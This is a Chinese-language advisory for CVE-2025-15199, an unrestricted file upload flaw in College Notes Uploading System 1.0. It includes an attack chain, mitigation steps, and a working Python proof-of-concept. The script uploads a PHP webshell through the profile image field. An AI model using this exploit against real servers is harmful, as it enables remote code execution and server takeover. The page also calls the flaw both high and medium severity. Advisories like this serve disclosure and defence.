CVE-2025-15199: College Notes Uploading System 1.0 任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-15199

漏洞类型

任意文件上传

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

code-projects College Notes Uploading System 1.0

漏洞概述

CVE-2025-15199是code-projects平台开发的College Notes Uploading System 1.0中的一个高危安全漏洞。该系统是一款用于上传和管理大学笔记的应用平台，在其dashboard/userprofile.php文件中的image参数存在任意文件上传漏洞。攻击者可以利用该漏洞绕过服务器的文件上传验证机制，上传恶意文件（如WebShell）到服务器，从而实现远程代码执行。由于该漏洞可通过网络远程利用，且只需要低权限用户即可实施攻击，因此具有较高的实际威胁性。漏洞已于2025年12月29日公开披露，CVSS评分6.3，属于中等严重程度。该漏洞影响系统的机密性、完整性和可用性，可能导致用户数据泄露、系统被完全控制等严重后果。建议受影响用户尽快采取修复措施，防止被恶意利用。

技术细节

该漏洞存在于College Notes Uploading System 1.0的/dashboard/userprofile.php文件中，具体问题出在image参数的输入验证不足。攻击者可以通过构造恶意请求，在上传个人资料图片时绕过服务器端的安全检查，上传任意类型的文件包括PHP脚本等可执行文件。漏洞的利用过程如下：首先攻击者需要拥有一个低权限账户，登录系统后访问用户资料编辑页面；然后在image参数处构造恶意文件上传请求，上传包含WebShell的PHP文件；最后通过访问上传的文件路径来执行任意代码。由于系统未对上传文件的类型、内容和扩展名进行严格的验证和过滤，攻击者可以成功上传并执行恶意代码，实现对服务器的远程控制。该漏洞的CVSS向量显示攻击复杂度低（AC:L），无需用户交互（UI:N），但需要低权限认证（PR:L），攻击向量为网络（AV:N）。

攻击链分析

STEP 1

步骤1

攻击者注册或获取College Notes Uploading System 1.0的低权限账户

STEP 2

步骤2

攻击者登录系统并访问/dashboard/userprofile.php用户资料编辑页面

STEP 3

步骤3

攻击者构造包含恶意PHP代码（如WebShell）的文件，在image参数处上传该文件

STEP 4

步骤4

服务器未正确验证上传文件类型，恶意文件被成功保存到服务器

STEP 5

步骤5

攻击者通过HTTP请求访问上传的恶意文件，执行任意代码实现远程控制

STEP 6

步骤6

攻击者获取服务器完全控制权，可进行数据窃取、横向移动等进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15199 PoC - College Notes Uploading System 1.0 Arbitrary File Upload
# Target: /dashboard/userprofile.php

def exploit(target_url, username, password, file_path):
    """
    Exploit for CVE-2025-15199
    Target: code-projects College Notes Uploading System 1.0
    Vulnerability: Unrestricted file upload in /dashboard/userprofile.php (image parameter)
    
    Usage:
        python cve-2025-15199.py http://target.com username password shell.php
    """
    
    # Login to get session
    login_url = f"{target_url}/login.php"
    login_data = {
        'username': username,
        'password': password
    }
    
    session = requests.Session()
    try:
        response = session.post(login_url, data=login_data, timeout=10)
        
        # Prepare malicious file upload
        upload_url = f"{target_url}/dashboard/userprofile.php"
        
        with open(file_path, 'rb') as f:
            files = {
                'image': (file_path, f.read(), 'application/x-php')
            }
            data = {
                'update': 'Update Profile'
            }
            
            # Send exploit request
            exploit_response = session.post(upload_url, files=files, data=data, timeout=10)
            
            if exploit_response.status_code == 200:
                print(f"[!] Exploit sent successfully!")
                print(f"[*] Check uploaded file at: {target_url}/upload/{file_path}")
            else:
                print(f"[!] Exploit failed with status code: {exploit_response.status_code}")
                
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        sys.exit(1)

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print("Usage: python cve-2025-15199.py <target_url> <username> <password> <file_path>")
        sys.exit(1)
    
    target_url = sys.argv[1].rstrip('/')
    exploit(target_url, sys.argv[2], sys.argv[3], sys.argv[4])

影响范围

College Notes Uploading System 1.0

防御指南

临时缓解措施

在官方修复补丁发布前，可采取以下临时缓解措施：1) 限制文件上传功能的使用权限，仅允许管理员上传文件；2) 对上传目录设置严格的访问控制策略，禁用脚本执行权限；3) 使用Web应用防火墙规则过滤非法文件上传请求；4) 加强服务器监控，及时发现异常文件上传行为；5) 定期检查服务器文件系统，发现并清除已上传的恶意文件；6) 实施输入验证，对所有用户输入进行严格过滤和验证。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15199
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15199
3 Details https://www.cvedetails.com/cve/CVE-2025-15199/
4 VulDB https://vuldb.com/cve/CVE-2025-15199
5 Link https://code-projects.org/
6 Link https://github.com/jjjjj-zr/jjjjjzr18/issues/1
7 Link https://vuldb.com/?ctiid.338586
8 Link https://vuldb.com/?id.338586
9 Link https://vuldb.com/?submit.724794
10 Link https://github.com/jjjjj-zr/jjjjjzr18/issues/1